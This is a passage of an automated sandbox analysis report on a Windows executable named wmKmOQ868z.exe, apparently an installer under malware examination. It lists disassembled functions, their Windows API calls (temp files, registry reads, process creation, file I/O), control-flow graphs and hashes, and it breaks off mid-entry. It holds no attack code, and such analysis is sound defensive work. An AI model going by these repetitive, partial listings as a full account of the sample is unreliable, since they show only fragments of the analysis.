                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\$P?z
                                          • API String ID: 3248276644-4211009014
                                          • Opcode ID: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                          • Instruction ID: f4f6e0775867387827aab8404002f3e8856b431f62ec50d584846b16db6dccac
                                          • Opcode Fuzzy Hash: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                          • Instruction Fuzzy Hash: 9BF02D36105E5319D62273365C09AAF1544CF86358709057BF852B12D5CF3C8A53CC7E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 672 406073-40607f 673 406080-4060b4 GetTickCount GetTempFileNameW 672->673 674 4060c3-4060c5 673->674 675 4060b6-4060b8 673->675 677 4060bd-4060c0 674->677 675->673 676 4060ba 675->676 676->677
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00406091
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040352D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819), ref: 004060AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                          • API String ID: 1716503409-44229769
                                          • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                          • Instruction ID: 3a9c7f2d553a521e2ba94e631897efa79da28a954d47360b9b57a106d7dab247
                                          • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                          • Instruction Fuzzy Hash: 83F09076B40204BFEB00CF69ED05F9EB7ACEB95750F11803AED05F7180E6B099548768

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 678 406422-406454 call 4063c1 681 406492 678->681 682 406456-406484 RegQueryValueExW RegCloseKey 678->682 684 406496-406498 681->684 682->681 683 406486-40648a 682->683 683->684 685 40648c-406490 683->685 685->681 685->684
                                          APIs
                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,00000000,?,?,?,?,Call,?,00000000,00406693,80000002), ref: 00406468
                                          • RegCloseKey.KERNELBASE(?,?,?), ref: 00406473
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue
                                          • String ID: Call
                                          • API String ID: 3356406503-1824292864
                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction ID: 8bbbfa9f798598a3d1dedb2a9c281e33174829b5b93865dedadbfc74a219c892
                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction Fuzzy Hash: 9F01B132110209BADF21CF51CD05EDB3BA8EB44360F018039FD1692150D738DA64DBA4

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 686 401389-40138e 687 4013fa-4013fc 686->687 688 401390-4013a0 687->688 689 4013fe 687->689 688->689 691 4013a2-4013a3 call 401434 688->691 690 401400-401401 689->690 693 4013a8-4013ad 691->693 694 401404-401409 693->694 695 4013af-4013b7 call 40136d 693->695 694->690 698 4013b9-4013bb 695->698 699 4013bd-4013c2 695->699 700 4013c4-4013c9 698->700 699->700 700->687 701 4013cb-4013f4 MulDiv SendMessageW 700->701 701->687
                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                          • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                          • Instruction ID: cd791cecd07b1aef7d4b508d0a52a2ac0ec5e235a68ccce80931b69816989e44
                                          • Opcode Fuzzy Hash: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                          • Instruction Fuzzy Hash: 6301F4326242109BE7195B389D05B6B36A8F791314F10863FF955F62F1DA78CC42DB4D

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 702 405aa8-405af2 CreateDirectoryW 703 405af4-405af6 702->703 704 405af8 GetLastError 702->704 705 405afe-405aff 703->705 704->705
                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AEA
                                          • GetLastError.KERNEL32 ref: 00405AF8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                          • Instruction ID: 13352011552d0ddc4b0c1568d720dcd5f2ba617a9a750a7f60e40e4c0ab4bb23
                                          • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                          • Instruction Fuzzy Hash: 52F0F4B0D0060EDADB00CFA4C6487EFBBB4AB04309F10812AD941B6281D7B882488FA9

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 706 405b37-405b68 CreateProcessW 707 405b76-405b77 706->707 708 405b6a-405b73 CloseHandle 706->708 708->707
                                          APIs
                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
                                          • CloseHandle.KERNEL32(?), ref: 00405B6D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3712363035-0
                                          • Opcode ID: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                          • Instruction ID: e42c3092a0fd4a031c4fd4b3b8927d6f3122727aa63034fdce6a98e2e8d9435a
                                          • Opcode Fuzzy Hash: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                          • Instruction Fuzzy Hash: ECE09AB4900249BFEB109F64AD05E7B776CE745644F008525BD10F6151D775A8148A79
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C), ref: 0040695A
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406975
                                            • Part of subcall function 004068D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                            • Part of subcall function 004068D8: wsprintfW.USER32 ref: 0040692A
                                            • Part of subcall function 004068D8: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040693E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                          • String ID:
                                          • API String ID: 2547128583-0
                                          • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                          • Instruction ID: 551f93d59f6a57a7cc32b559d7ebc8a6d8da67cd5dc02587d5b4d2bd1ffdf244
                                          • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                          • Instruction Fuzzy Hash: 95E08673504310AAD2105A705E04C2B73B89F85740302443EF942F2140D734DC32E769
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,004030E2,C:\Users\user\Desktop\wmKmOQ868z.exe,80000000,00000003), ref: 00406048
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                          • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                          • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                          • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
                                          • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405B16
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                          • Instruction ID: 7bb2d1eb449126eed485e4eb4fbdbafbf981390ed288ef949080c13de55397a1
                                          • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                          • Instruction Fuzzy Hash: 7CC08C30314902DADA802B209F0870B3A60AB80340F154439A582E00E4CA30A445C92D
                                          APIs
                                          • CreateFileA.KERNELBASE(00000000), ref: 6F702C57
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2686110588.000000006F701000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F700000, based on PE: true
                                          • Associated: 00000000.00000002.2686088914.000000006F700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686134312.000000006F704000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686197105.000000006F706000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f700000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 176c73c32887ed8fc9ec0a8f72f7976fd4b1bc9cbc744cec38e885c268dba26b
                                          • Instruction ID: a2bf97452b1604db9fe3cfdb31e08df6ba834ef4b801018055e69a296db34548
                                          • Opcode Fuzzy Hash: 176c73c32887ed8fc9ec0a8f72f7976fd4b1bc9cbc744cec38e885c268dba26b
                                          • Instruction Fuzzy Hash: 974142F3504704ABDF10AF78EA89B5E37E4EF85368F20843AE804C6250DB34A895DB95
                                          APIs
                                          • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,004034E4,?,?,0040332B,?,00000004,00000000,00000000,00000000), ref: 004060DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                          • Instruction ID: 1a6ac9c2f17c3bf7024e7b579d6ce6ab3b84958f313ea5b4b1ce89539a84cc3a
                                          • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                          • Instruction Fuzzy Hash: 55E0EC3225026AABDF10DE55DC00EEB7BACEB053A0F018437F956E7150DA31E93197A8
                                          APIs
                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,0040349A,?,00793700,?,00793700,?,?,00000004,00000000), ref: 0040610A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
